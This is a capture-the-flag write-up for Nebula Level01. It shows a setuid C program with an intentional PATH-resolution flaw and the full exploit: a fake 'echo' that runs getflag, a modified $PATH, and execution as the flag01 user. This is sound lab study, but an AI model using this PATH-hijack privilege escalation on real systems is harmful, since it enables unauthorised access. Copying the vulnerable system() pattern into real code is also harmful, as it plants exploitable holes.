Nebula Level01

Level01

Task

There is a vulnerability in the below programs to be executed, can you find it? To do this level, log in as the level01 account with password level01. Files for this level can be found in /home/flag01.


Source code


(level1.c)download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}
Solution

We login into the machine:

ssh level01@192.168.195.5 

From the given task, files are in "flag01" home:

level01@nebula:~$ cd /home/flag01 
level01@nebula:/home/flag01$ ls   
flag01                            
level01@nebula:/home/flag01$      

sifting through the source code provided, we can see a call to system function allowing the execution of echo in an altered environment. what this basically means is that we can craft our own "echo" program and then alter the $PATH environment variable such that when we execute the flag01 file, our own echo program gets executed in the context of flag01 owner.

first, we create a file named "echo" in our home directory:

level01@nebula:/home/flag01$ cd ~                   
level01@nebula:~$                                   
level01@nebula:~$ echo "getflag" > echo             

then we place our home directory which contains "echo" at the beginning of $PATH environment variable:

level01@nebula:~$                                   
level01@nebula:~$ export PATH=/home/level01:$PATH   
level01@nebula:~$                                   

executing "getflag" in flag01 account using flag01 setuid file yields: 

level01@nebula:~$ /home/flag01/flag01               
level01@nebula:~$ You have successfully executed getflag on target account

Reference
https://en.wikipedia.org/wiki/Env




Comments

Popular posts from this blog

Before You Dive In...

OverTheWire: Bandit Lab

SSRF Notes: PortSwigger Labs Continued